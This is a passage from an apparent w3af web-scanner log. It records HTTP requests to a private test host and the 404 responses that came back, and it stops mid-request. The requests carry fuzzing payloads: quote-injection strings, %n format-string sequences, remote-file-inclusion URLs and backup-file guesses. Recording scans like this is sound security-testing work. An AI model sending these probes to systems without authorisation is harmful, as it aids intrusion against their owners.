            <http-transaction id="290">
                <http-request>
                    <status>GET http://10.12.68.43:31337/SgbxOvuY HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="300">
                <http-request>
                    <status>GET http://10.12.68.43:31337/a%27b%22c%27d%22 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="309">
                <http-request>
                    <status>GET http://10.12.68.43:31337/a%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="312">
                <http-request>
                    <status>GET http://10.12.68.43:31337/a%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="313">
                <http-request>
                    <status>GET http://10.12.68.43:31337/hTtp%3A%2F%2Fw3af.org%2F HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="557" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/hTtp%3A%2F%2Fw3af.org%2F&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="315">
                <http-request>
                    <status>GET http://10.12.68.43:31337/htTps%3A%2F%2Fw3af.org%2F HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="558" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/htTps%3A%2F%2Fw3af.org%2F&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="316">
                <http-request>
                    <status>GET http://10.12.68.43:31337/d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="317">
                <http-request>
                    <status>GET http://10.12.68.43:31337/hTtp%3A/w3af.org/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="551" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/hTtp%3A//w3af.org/&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="318">
                <http-request>
                    <status>GET http://10.12.68.43:31337/htTps%3A/w3af.org/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="552" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/htTps%3A//w3af.org/&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="319">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%25n HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="320">
                <http-request>
                    <status>GET http://10.12.68.43:31337/fTp%3A%2F%2Fw3af.org%2F HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="556" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/fTp%3A%2F%2Fw3af.org%2F&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="322">
                <http-request>
                    <status>GET http://10.12.68.43:31337/fTp%3A/w3af.org/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="550" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/fTp%3A//w3af.org/&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="323">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="328">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="331">
                <http-request>
                    <status>GET http://10.12.68.43:31337/post.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="540" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="332">
                <http-request>
                    <status>GET http://10.12.68.43:31337/http%3A/www.w3af.org/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="555" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/http%3A//www.w3af.org/&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="333">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="334">
                <http-request>
                    <status>GET http://10.12.68.43:31337/FSGGDsqb HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="336">
                <http-request>
                    <status>GET http://10.12.68.43:31337/http%3A%2F%2Fwww.w3af.org%2F HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="561" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/http%3A%2F%2Fwww.w3af.org%2F&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="337">
                <http-request>
                    <status>GET http://10.12.68.43:31337/post~ HTTP/1.1</status>
                    <headers>
